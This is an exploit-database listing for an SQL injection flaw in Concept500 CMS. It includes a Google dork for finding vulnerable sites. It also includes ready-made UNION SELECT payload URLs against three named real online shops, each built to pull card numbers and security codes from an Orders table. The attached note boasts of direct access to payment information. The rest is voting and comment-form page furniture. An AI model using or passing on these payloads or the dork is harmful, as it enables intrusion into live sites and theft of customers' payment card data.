Concept500 CMS SQL Injection

2011.08.10

Credit: Anonymous

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: [inurl : inurl:viewItem.php?id= ]

# Exploit Title: Concept500 CMS SQL Injection Vulnerability
# Google Dork: [inurl : inurl:viewItem.php?id= ]
# Date: 2011-07-08
# Author: Sepehr Security Team
# Discovered By: H3X
# Software Site: http://www.concept500.co.uk/
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
[Expl0it :]
http://www.[sitename].com/viewitem.php?id=[SQL Injection]
[DEMO:]
1 ) http://www.mycommissionbid.com/bid/viewitem.php?id=-487+union+select+1,group_concat%28SecurityNo,0x3a,CardNo%29,3,4,5,6,7,8,9,10,11+from+Orders--
2) http://www.historicflyingclothing.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--
3) http://www.hiscoll.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--
and more ...
[Note :]
with this vulnerability you can get direct access to payment information same as paypal and other card information on database.
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
[Spc. Thanks :]
thE_Knight | Einstein | W!z4rd | Naboodgar | CONS7ANTINE | Mr.Amir-Masoud| nImaarek | GrEEn-ErRor | Net.Plus | Cruel
All Sepehr Sceurity Team Members And All Iranian Hack3rs
[Home Page :]
wWw.Sepehr-Team.orG

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Concept500 CMS SQL Injection

Dork: [inurl : inurl:viewItem.php?id= ]

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.